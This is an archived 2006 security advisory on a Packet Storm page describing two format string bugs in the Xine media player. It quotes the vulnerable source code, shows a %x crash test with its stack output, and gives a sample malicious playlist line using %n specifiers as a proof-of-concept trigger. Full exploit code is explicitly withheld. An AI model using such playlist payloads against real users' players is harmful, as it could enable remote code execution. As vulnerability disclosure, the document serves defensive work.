exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

16.txt

16.txt
Posted Apr 28, 2006
Authored by c0ntex | Site open-security.org

open security advisory #16 - Xine Media Player Format String Bug - There are 2 format string bugs in the latest version of Xine that could be exploited by a malicious person to execute code on the system of a remote user running the media player against a malicious playlist file. By passing a format specifier in the path of a file that is embedded in a remote playlist, it is possible to trigger this bug.

tags | advisory, remote
SHA-256 | d4f570c418c920fa2ace268f9e01803444655bf73c95bb1f9a806e7168cb8848

16.txt

Change Mirror Download
/*
*****************************************************************************************************************
$ An open security advisory #16 - Xine Media Player Format String Bug
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org
2: Bug Released: April 18th 2006
3: Bug Impact Rate: Undefined
4: Bug Scope Rate: Local / Remote
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************

Xine Media Player
http://winehq.de

"xine is a free multimedia player. It plays back CDs, DVDs, and VCDs. It also decodes multimedia files like
AVI, MOV, WMV, and MP3 from local disk drives, and displays multimedia streamed over the Internet. It
interprets many of the most common multimedia formats available - and some of the most uncommon formats, too."


There are 2 format string bugs in the latest version of Xine that could be exploited by a malicious person
to execute code on the system of a remote user running the media player against a malicious playlist file.
By passing a format specifier in the path of a file that is embedded in a remote playlist, it is possible
to trigger this bug.


The evil code can be found here, in xine-ui-0.99.4/src/xitk/main.c:453:
... snip ...

static void print_formatted(char *title, const char *const *plugins) {
const char *plugin;
char buffer[81];
int len;
char *blanks = " ";

printf(title);

sprintf(buffer, "%s", blanks);
plugin = *plugins++;

while(plugin) {

len = strlen(buffer);

if((len + (strlen(plugin) + 3)) < 80) {
sprintf(buffer, "%s%s%s", buffer, (strlen(buffer) == strlen(blanks)) ? "" : ", ", plugin);
}
else {
printf(buffer);
printf(",\n");
snprintf(buffer, sizeof(buffer), "%s%s", blanks, plugin);
}

... snip ...


Looking at BUG-REPORT.txt we can verify the goodness:

c0ntex@debauch:~$ xine --no-splash --bug-report -gI AAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x
This is xine (X11 gui) - a free video player v0.99.3.
(c) 2000-2004 The xine Team.
xiTK received SIGSEGV signal, RIP.
Aborted
c0ntex@debauch:~$ less BUG-REPORT.txt

... snip ...
xine: found input plugin : file input plugin

---------------------- (ERROR) ----------------------
The specified file or mrl is not found. Please check it twice. (AAAAAAAA811bfb1be1fdac88e232888e2329
8000206568546365707365696669696620646f20656c726d20727369206c746f6e20756f6620202e646e61656c5063206573
6b636568207469206369777428202e65 [4141414141414141] 7825782578257825782578257825782578257825)
... snip ...


An example malicious playlist file to trigger the bug:


#EXTM3U
#EXTINFO !!All_You_Playlists_Are_Belong_To_Us - SHHEEEELLLLCCCCOOOOOODDDDDDEEEEEEEEEEE!!
AAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.13068u%n%hn


Obviously, we can see straight away that this is a straight forward format string bug which provides a trivial
way to hijack .DTORS or some other useful address, allowing the execution of malicious code on a remote victims
boxen.

I dropped in to the Xine developers IRC channel over a year ago telling them about this bug, I never got a reply,
it's my guess that they are as sick of Xine bugs as everyone else is. I hope you havent been using Xine to play
remote Music fileZ!!! tsk tsk - those that have know who they are ;) and we do too :D

We are not dropping exploit code with this advisory so that Xine can get their act together, write decent code,
and release a patched version. I guess the Xine guys haven't heard of egrep. Anyway, maybe they will patch up
before more people get owned.


Full Disclosure -> Useful for the victims
Open Source -> Useful for the hackers
Shameless 1980's format string bug -> Priceless


Regards to everyone I know, especially all the #social's @ pulltheplug.

*/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close